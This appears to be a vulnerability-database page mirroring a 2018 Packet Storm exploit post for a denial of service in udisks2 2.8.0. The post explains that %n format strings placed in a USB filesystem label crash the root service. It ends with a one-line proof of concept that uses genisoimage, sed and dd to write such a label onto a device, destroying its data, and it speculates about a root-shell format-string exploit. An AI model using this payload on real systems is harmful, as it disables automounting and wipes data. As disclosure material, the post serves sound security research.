Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

udisks2 2.8.0 Denial Of Service

🗓️ 24 Sep 2018 00:00:00Reported by OxagastType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

udisks2 2.8.0 Denial Of Service vulnerability via filesystem labe

Code
`# Exploit: udisks2 2.8.0 - Denial of Service (PoC)  
# Author: oxagast  
# Date: 2018-09-22  
# Vendor Homepage: http://storaged.org/  
# Software Link: https://github.com/storaged-project/udisks  
# Version: <=udisks2 2.8.0  
# Tested on: Ubuntu x64  
__ _ _ __ ___ __ ____ ____   
/ ( \/ )/ _\ / __)/ _\/ ___(_ _)  
( O ) (/ ( (_ / \___ \ )(   
\__(_/\_\_/\_/\___\_/\_(____/(__)  
  
# ========The vulnerable section of code is:========  
#if GLIB_CHECK_VERSION(2, 50, 0)  
g_log_structured ("udisks", (GLogLevelFlags) level,  
"MESSAGE", message, "THREAD_ID", "%d", (gint) syscall (SYS_gettid),  
"CODE_FUNC", function, "CODE_FILE", location);  
#else  
g_log ("udisks", level, "[%d]: %s [%s, %s()]", (gint) syscall (SYS_gettid), message, location, function);  
  
# =================Short Whitepaper=================  
# The vulnerability can be triggered by using one computer to create a filesystem on a USB key   
# (or other removable media), then editing it's filesystem label to include a bunch of %n's, removing and   
# inserting the media into another computer running udisks2 <=2.8.0. This binary runs as root, and if   
# exploited in that capacity could potentially allow full compromise. This will cause a denial of service,   
# crashing udisks2 and not letting it restart (or until /var/lib/udisks2/mounted-fs is   
# removed and the system is restarted). This keeps the system from automounting things like USB drives and CDs.  
# The vulnerability -may- be exploitable beyond a DoS by crafting a format string exploit and putting it  
# in the label of the drive. I tried to exploit it for a couple days, but cannot find a filesystem with a  
# lengthy enough label to be able to fit the exploit and spawn a root shell, as the smallest shellcode I  
# could make was around 50 characters, and the longest filesystem labels I could find are limited to 32 characters.  
  
# =============Proof of Concept Code================  
# This code will destroy any information on /dev/sdb1!!!! Change that to where you have your USB media.  
# PoC source code:  
  
genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1  
  
# Now remove and reinsert the media and wait for the crash report.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Sep 2018 00:00Current
7.4High risk
Vulners AI Score7.4
udisks2denial of servicefilesystem labelusbformat string exploitroot compromise
31